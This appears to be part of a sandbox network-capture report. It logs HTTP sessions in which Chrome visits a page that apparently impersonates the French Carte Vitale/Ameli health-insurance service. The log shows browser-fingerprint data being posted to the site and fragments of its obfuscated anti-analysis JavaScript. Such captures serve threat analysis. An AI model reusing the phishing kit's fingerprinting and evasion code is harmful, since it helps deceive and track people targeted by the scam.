                        2024-07-03 12:39:17 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 39 72 50 32 6c 48 6d 66 76 53 33 57 73 6b 45 70 64 37 6e 34 41 4a 36 2d 77 65 61 30 51 57 4d 70 43 33 4e 69 65 68 56 68 4d 72 6f 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g9rP2lHmfvS3WskEpd7n4AJ6-wea0QWMpC3NiehVhMroAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                        2024-07-03 12:39:17 UTC1INData Raw: 4a
                        Data Ascii: J


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.649744104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:18 UTC776OUTGET /cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:19 UTC200INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:18 GMT
                        Content-Type: image/png
                        Content-Length: 61
                        Connection: close
                        Server: cloudflare
                        CF-RAY: 89d6f0079f4e433a-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 07 00 00 00 2e 08 02 00 00 00 6b 93 94 7a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                        Data Ascii: PNGIHDR.kzIDAT$IENDB`


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.649743104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:18 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:19 UTC375INHTTP/1.1 404 Not Found
                        Date: Wed, 03 Jul 2024 12:39:19 GMT
                        Content-Type: application/json
                        Content-Length: 7
                        Connection: close
                        cf-chl-out: PxAK3j0SARz7bI6jhIQcLA==$0KJs0nn7MO1udhNPvfz2Jg==
                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Server: cloudflare
                        CF-RAY: 89d6f0079f0b41a9-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:19 UTC7INData Raw: 69 6e 76 61 6c 69 64
                        Data Ascii: invalid


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.649747104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:21 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        Content-Length: 30763
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Content-type: application/x-www-form-urlencoded
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        CF-Challenge: 0228ee3c2a32d26
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Origin: https://challenges.cloudflare.com
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:21 UTC16384OUTData Raw: 76 5f 38 39 64 36 65 66 65 31 34 61 61 64 37 32 38 66 3d 6a 63 73 71 44 41 43 51 47 43 64 4d 73 46 77 64 46 64 47 71 34 73 4d 77 63 4d 56 43 34 52 31 77 77 71 68 64 32 58 52 37 71 48 75 71 52 4e 73 52 77 71 43 73 41 24 52 4f 71 74 4f 47 41 4b 52 66 71 74 6b 4e 2d 35 52 7a 73 52 78 7a 52 52 25 32 62 52 7a 24 62 4d 43 6d 52 68 79 74 24 52 54 62 71 52 65 52 24 4f 6f 33 52 24 56 31 52 46 79 37 76 65 2d 34 38 56 2d 24 77 52 48 72 52 43 74 56 56 52 52 64 47 52 4a 70 52 52 4a 76 71 32 77 52 6b 44 64 75 2d 66 71 69 68 59 4f 63 2b 66 71 52 79 47 7a 43 47 4b 46 74 6e 79 6f 69 74 32 57 41 30 24 4f 63 79 79 33 4b 52 43 66 41 52 52 63 77 36 59 6c 6b 62 71 43 37 6b 36 6c 2b 67 36 2d 57 65 35 31 56 6f 51 65 2b 46 43 55 55 6a 4b 37 57 6e 48 50 6b 54 54 61 69 35 36 6d 63
                        Data Ascii: v_89d6efe14aad728f=jcsqDACQGCdMsFwdFdGq4sMwcMVC4R1wwqhd2XR7qHuqRNsRwqCsA$ROqtOGAKRfqtkN-5RzsRxzRR%2bRz$bMCmRhyt$RTbqReR$Oo3R$V1RFy7ve-48V-$wRHrRCtVVRRdGRJpRRJvq2wRkDdu-fqihYOc+fqRyGzCGKFtnyoit2WA0$Ocyy3KRCfARRcw6YlkbqC7k6l+g6-We51VoQe+FCUUjK7WnHPkTTai56mc
                        2024-07-03 12:39:21 UTC14379OUTData Raw: 37 52 52 24 47 47 71 78 71 52 47 4d 75 43 75 52 4e 43 36 4f 59 52 35 71 32 75 43 4f 33 47 71 43 73 52 6c 52 51 71 24 63 49 58 52 67 71 46 52 32 73 52 38 71 68 43 32 33 52 70 71 41 64 43 37 52 46 71 73 75 32 38 64 33 52 68 73 43 37 52 38 5a 53 6d 75 69 52 35 52 7a 63 43 77 52 43 2d 74 36 50 75 2d 50 75 72 52 52 6f 69 73 71 74 4d 44 46 64 46 52 79 73 52 63 52 79 4e 52 75 32 47 52 37 64 43 75 32 74 56 68 47 24 7a 75 74 52 64 52 73 64 52 73 52 72 69 52 58 32 34 52 24 75 74 71 43 77 52 57 67 43 38 35 51 75 46 52 41 54 32 34 52 45 51 43 47 41 55 77 4a 52 68 64 52 74 71 2d 62 6e 72 44 54 71 51 52 68 75 41 57 71 79 4e 52 58 43 77 52 78 62 43 58 32 53 5a 46 52 32 71 32 46 64 4d 47 58 30 6b 62 52 66 74 43 47 41 7a 71 35 52 79 63 41 5a 52 45 51 6a 59 6b 74 52 78 62
                        Data Ascii: 7RR$GGqxqRGMuCuRNC6OYR5q2uCO3GqCsRlRQq$cIXRgqFR2sR8qhC23RpqAdC7RFqsu28d3RhsC7R8ZSmuiR5RzcCwRC-t6Pu-PurRRoisqtMDFdFRysRcRyNRu2GR7dCu2tVhG$zutRdRsdRsRriRX24R$utqCwRWgC85QuFRAT24REQCGAUwJRhdRtq-bnrDTqQRhuAWqyNRXCwRxbCX2SZFR2q2FdMGX0kbRftCGAzq5RycAZREQjYktRxb
                        2024-07-03 12:39:21 UTC809INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 3568
                        Connection: close
                        cf-chl-out: jZXukho4C4pBdAHRJUnV2Rhkxii/eF7wMsa8+asbc8iZ2iF/ns4xAYNygQ42mmImvJPbZuOuhzGpZLY9ILebEpeC4sUHiUMmv13xFwE4keGtAWo9tfhO47+Ar/QzNBx0$+jMO9OKAp25UMkCVlFQxYA==
                        cf-chl-out-s: zsdXH6Xe7MSWnf7rExotFbLLlIZGU4E7dRi4/W70OxyhTgV2mu9xXeqIEwTJB8FPNvJcUUlkhqfVCtCEACt/DnCxS53eoDkqhp5VBeTWcAKzwPbwLDgKwf+6jK0oQizPjnDs2aJVLFt4dhwkCMJrOnsQLte7ZGGaa6MSFuwTtP7Fbf9je1wVL17pBfuqL7denVM1PZGaUGOYlqOaD8kZoHnaYDuxXC/7u9Oq5ePhY4n4IMGT1T87of+aWBcO6wiZSdZnXRe/jszyPb6h+HuNuEjgEDWlsiYPU/kHynSqMXantsT4a3SjJLmwrlrmE+s/+0i+oFOI3+4M9mTcvjekRGe6E41il+b//Xmdr7Wz6Piei+I0N85ZbV7RsMemAZTh$j1n3GnbYGGorS6qqXCFWUA==
                        Server: cloudflare
                        CF-RAY: 89d6f0173b400c7e-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:21 UTC560INData Raw: 6b 48 69 55 70 37 6d 72 73 59 75 4a 73 4c 47 4e 64 36 65 44 70 63 61 39 74 37 66 43 69 35 6d 78 73 4d 2b 4d 6e 4b 69 32 79 71 79 76 6b 5a 61 57 73 64 44 51 33 4c 33 4c 6e 38 48 50 33 71 54 66 30 2b 4b 6f 33 65 4b 6f 77 65 44 6c 72 75 43 30 35 73 43 77 77 39 50 56 7a 37 66 54 32 65 72 51 33 51 54 30 41 65 51 41 77 2b 66 38 78 39 30 42 42 75 44 65 30 41 4c 63 7a 4f 58 77 38 65 54 6e 39 41 7a 53 31 74 73 53 46 4e 4c 2b 47 75 41 62 47 65 41 55 47 79 44 38 48 42 30 69 41 42 33 77 49 67 33 73 41 78 45 43 42 51 34 55 42 2f 72 32 47 52 76 32 2f 68 67 65 4d 55 45 6d 42 51 51 6f 51 68 78 41 51 30 51 77 50 41 67 6a 42 53 6b 65 55 6b 41 55 54 46 67 31 4f 44 73 6d 4b 44 52 55 59 7a 70 46 58 31 73 34 56 79 59 31 51 79 51 74 4b 56 73 69 62 7a 31 71 56 46 42 6c 51 32 6c
                        Data Ascii: kHiUp7mrsYuJsLGNd6eDpca9t7fCi5mxsM+MnKi2yqyvkZaWsdDQ3L3Ln8HP3qTf0+Ko3eKoweDlruC05sCww9PVz7fT2erQ3QT0AeQAw+f8x90BBuDe0ALczOXw8eTn9AzS1tsSFNL+GuAbGeAUGyD8HB0iAB3wIg3sAxECBQ4UB/r2GRv2/hgeMUEmBQQoQhxAQ0QwPAgjBSkeUkAUTFg1ODsmKDRUYzpFX1s4VyY1QyQtKVsibz1qVFBlQ2l
                        2024-07-03 12:39:21 UTC1369INData Raw: 4b 44 52 51 58 6a 45 61 52 69 52 46 59 57 67 71 58 30 74 6e 59 56 68 78 54 53 31 4a 54 7a 52 30 53 32 6c 6e 65 31 52 73 50 54 68 55 57 33 2b 44 57 55 39 7a 67 31 31 35 56 59 64 44 51 31 74 57 59 47 4a 6f 68 47 56 6b 55 6c 52 71 56 70 4e 36 6b 70 52 6f 55 4a 47 55 58 5a 4f 43 57 36 53 50 69 48 4f 67 6e 49 78 6c 70 4b 53 4d 5a 34 71 6e 63 33 36 68 70 34 79 79 6b 35 69 57 65 58 31 36 6c 58 4b 65 6b 62 47 54 75 49 61 77 67 73 47 68 76 4a 79 6d 6a 4c 37 45 6b 64 43 67 6b 36 53 56 7a 71 36 56 7a 4e 6a 4c 79 4c 36 39 6d 61 2f 58 31 73 4f 69 31 38 57 69 34 4e 4c 58 76 65 44 50 35 64 6a 64 7a 75 65 77 72 76 44 6e 37 63 2f 4a 31 37 66 62 35 39 37 4e 38 63 2f 31 77 64 50 51 39 65 66 61 79 50 6e 64 44 74 33 38 42 75 4d 4b 43 75 54 7a 41 2f 62 35 38 76 73 52 45 2f 62
                        Data Ascii: KDRQXjEaRiRFYWgqX0tnYVhxTS1JTzR0S2lne1RsPThUW3+DWU9zg115VYdDQ1tWYGJohGVkUlRqVpN6kpRoUJGUXZOCW6SPiHOgnIxlpKSMZ4qnc36hp4yyk5iWeX16lXKekbGTuIawgsGhvJymjL7EkdCgk6SVzq6VzNjLyL69ma/X1sOi18Wi4NLXveDP5djdzuewrvDn7c/J17fb597N8c/1wdPQ9efayPndDt38BuMKCuTzA/b58vsRE/b
                        2024-07-03 12:39:21 UTC1369INData Raw: 45 52 69 55 55 46 66 4a 69 4d 37 4b 6d 78 6b 55 44 74 47 59 30 56 4a 52 6d 56 4d 52 6e 4a 30 5a 55 70 39 53 56 68 35 56 32 31 4e 56 59 56 42 57 47 74 42 68 47 6c 58 69 33 6d 53 6a 6f 36 41 6a 31 35 34 6b 49 46 6d 6d 57 56 30 6c 58 4f 4a 61 58 53 68 58 58 46 2b 6c 71 5a 34 6c 34 6d 5a 61 71 46 33 6d 34 69 6a 72 6e 4b 64 64 6e 2b 33 6b 35 75 75 6c 71 65 64 75 59 69 36 6a 61 4f 64 6a 35 57 50 73 34 6d 72 67 63 53 70 6c 38 76 4a 69 36 2f 4e 76 63 65 6b 70 4b 6e 4e 74 36 7a 62 79 64 79 6f 6e 37 62 52 72 37 54 62 72 71 50 45 30 72 2f 4c 78 38 54 6d 36 36 37 6e 34 64 50 42 79 63 4c 33 78 72 54 6a 75 2f 48 34 35 76 7a 50 75 75 50 76 42 65 49 45 33 4f 50 33 78 75 49 4f 31 51 2f 6c 32 2b 62 67 35 73 34 41 7a 75 37 6a 37 64 58 78 35 74 7a 62 38 2f 72 58 41 76 73 46
                        Data Ascii: ERiUUFfJiM7KmxkUDtGY0VJRmVMRnJ0ZUp9SVh5V21NVYVBWGtBhGlXi3mSjo6Aj154kIFmmWV0lXOJaXShXXF+lqZ4l4mZaqF3m4ijrnKddn+3k5uulqeduYi6jaOdj5WPs4mrgcSpl8vJi6/NvcekpKnNt6zbydyon7bRr7TbrqPE0r/Lx8Tm667n4dPBycL3xrTju/H45vzPuuPvBeIE3OP3xuIO1Q/l2+bg5s4Azu7j7dXx5tzb8/rXAvsF
                        2024-07-03 12:39:21 UTC270INData Raw: 52 63 56 6d 64 4e 53 32 6c 52 4c 45 74 72 56 45 6f 78 57 30 4e 46 5a 6c 68 53 4e 6e 4e 41 50 32 42 4f 50 6e 52 58 65 58 4e 31 56 6e 56 37 52 59 69 52 62 59 5a 69 67 58 64 2f 5a 6f 79 51 6b 47 32 49 6d 49 68 75 6a 59 71 59 68 58 71 64 70 58 47 53 6f 49 43 41 6f 61 2b 6e 5a 35 6d 6c 61 61 75 78 71 61 64 33 70 6f 4b 53 63 33 75 71 65 48 6c 39 74 49 2b 42 72 58 2b 38 6d 4d 6a 46 68 4a 62 48 79 4b 43 77 75 5a 33 4b 79 4d 61 73 77 35 61 34 6c 64 44 59 32 72 57 2b 31 63 2b 77 32 62 75 69 33 4e 44 63 76 74 66 47 75 65 6a 67 79 62 33 47 32 39 54 42 72 64 4c 51 78 73 62 5a 34 38 6d 31 33 2b 6a 4e 74 37 6e 56 2f 4e 6d 2f 39 73 48 4a 78 62 33 6a 39 51 4d 47 45 50 6b 46 2f 4f 58 72 37 67 4c 4f 39 42 7a 6d 31 39 33 75 43 41 30 69 2f 51 38 4e 47 50 77 52 4a 53 6f 47 46
                        Data Ascii: RcVmdNS2lRLEtrVEoxW0NFZlhSNnNAP2BOPnRXeXN1VnV7RYiRbYZigXd/ZoyQkG2ImIhujYqYhXqdpXGSoICAoa+nZ5mlaauxqad3poKSc3uqeHl9tI+BrX+8mMjFhJbHyKCwuZ3KyMasw5a4ldDY2rW+1c+w2bui3NDcvtfGuejgyb3G29TBrdLQxsbZ48m13+jNt7nV/Nm/9sHJxb3j9QMGEPkF/OXr7gLO9Bzm193uCA0i/Q8NGPwRJSoGF


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.649748102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:21 UTC741OUTPOST /?iauthentification HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Content-Length: 589
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-platform: "Windows"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4UJFnULtBACfK6QP
                        Accept: */*
                        Origin: https://cartevitale-ameli.santeassures-informations.eu
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:21 UTC589OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 34 55 4a 46 6e 55 4c 74 42 41 43 66 4b 36 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 70 5f 63 6f 6c 6c 65 63 74 22 0d 0a 0d 0a 7b 22 32 38 36 22 3a 22 74 65 67 66 22 2c 22 39 38 36 2e 33 38 34 30 2e 35 2e 32 36 36 22 3a 22 65 75 70 69 73 6e 68 22 2c 22 22 3a 22 65 75 70 71 62 7a 22 2c 22 39 31 22 3a 22 65 75 70 67 6f 22 2c 22 31 33 6b 22 3a 22 65 75 70 65 6e 22 2c 22 46 48 2d 61 72 22 3a 22 79 73 67 65 76 22 2c 22 32 37 36 35 38 36 37 35 39 31 33 38 38 35 2e 33 2c 33 32 35 30 30 39 31 36 36 38 36 34 38 35 38 2e 30 37 2c 30 37 31 35 34 33 37 31 39 34 34 31 35 31 2e 33 35 37 2c 32 37 36 35 38 36 37 35
                        Data Ascii: ------WebKitFormBoundary4UJFnULtBACfK6QPContent-Disposition: form-data; name="fp_collect"{"286":"tegf","986.3840.5.266":"eupisnh","":"eupqbz","91":"eupgo","13k":"eupen","FH-ar":"ysgev","27658675913885.3,325009166864858.07,07154371944151.357,27658675
                        2024-07-03 12:39:22 UTC317INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 2
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:22 UTC2INData Raw: 6f 6b
                        Data Ascii: ok


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.649749104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:22 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:22 UTC200INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:22 GMT
                        Content-Type: image/png
                        Content-Length: 61
                        Connection: close
                        Server: cloudflare
                        CF-RAY: 89d6f01b2a2a7cb4-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 07 00 00 00 2e 08 02 00 00 00 6b 93 94 7a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                        Data Ascii: PNGIHDR.kzIDAT$IENDB`


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.649750102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:22 UTC784OUTGET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:22 UTC343INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 3064
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:22 UTC3064INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 2f 2a 20 54 68 65 20 4d 6f 64 61 6c 20 28 62 61 63 6b 67 72 6f 75 6e 64 29 20 2a 2f 0d 0a 2e 6d 6f 64 61 6c 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 2f 2a 20 53 74 61 79 20 69 6e 20 70 6c 61 63 65 20 2a 2f 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 2f 2a 20 53 69 74 20 6f 6e 20 74 6f 70 20 2a 2f 0d 0a 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 20 2f 2a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 62 6f 78
                        Data Ascii: <html><head><link rel="icon" href="data:,"><meta http-equiv="refresh" content="5"><style>/* The Modal (background) */.modal { position: fixed; /* Stay in place */ z-index: 1; /* Sit on top */ padding-top: 100px; /* Location of the box


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.649752102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:23 UTC570OUTGET /?js_challenge HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:24 UTC237INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:21 GMT
                        Content-Type: application/javascript
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:24 UTC16147INData Raw: 31 66 34 61 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 5f 69 6e 74 65 72 6e 65 5f 5f 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 63 69 66 28 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 5f 5f 69 6e 74 65 72 6e 65 5f 5f 28 29 2c 77 69 6e 64 6f 77 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 5b 72 5d 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 5b 72 5d 2e 74 6f 53 74 72 69 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 2d 31 3d 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 26 26 2d 31 3d 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 5f 5f 69 6e 74 65 72 6e 65 5f 5f 22 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 6d 64 35 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61
                        Data Ascii: 1f4afunction __interne__(){}function cif(){for(var r in __interne__(),window)if("function"==typeof window[r]){var n=window[r].toString().toLowerCase();if(-1===n.indexOf("[native code]")&&-1===n.indexOf("__interne__"))return!0}return!1}md5=function(r){va
                        2024-07-03 12:39:24 UTC743INData Raw: 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 28 29 5b 5d 7b 7d 22 2e 69 6e 64 65 78 4f 66 28 72 29 2c 5f 3d 72 3d 3e 75 28 72 29 3e 2d 31 3f 22 0d 0a 32 39 34 0d 0a 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 29 28 5d 5b 7d 7b 22 5b 75 28 72 29 5d 3a 72 2c 64 3d 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 5f 5f 69 6e 74 65 72 6e 65 5f 5f 28 29 3b 76 61 72 20 6f 3d 5b 5d 3b 66 6f 72 28 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 28 69 64 78 3d 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 29 3e 3d 34 38 26 26 69 64 78 3c 3d 35 37 3f 69 64 78 3c 3d 35 32 3f 6f 5b 69 5d 3d 53
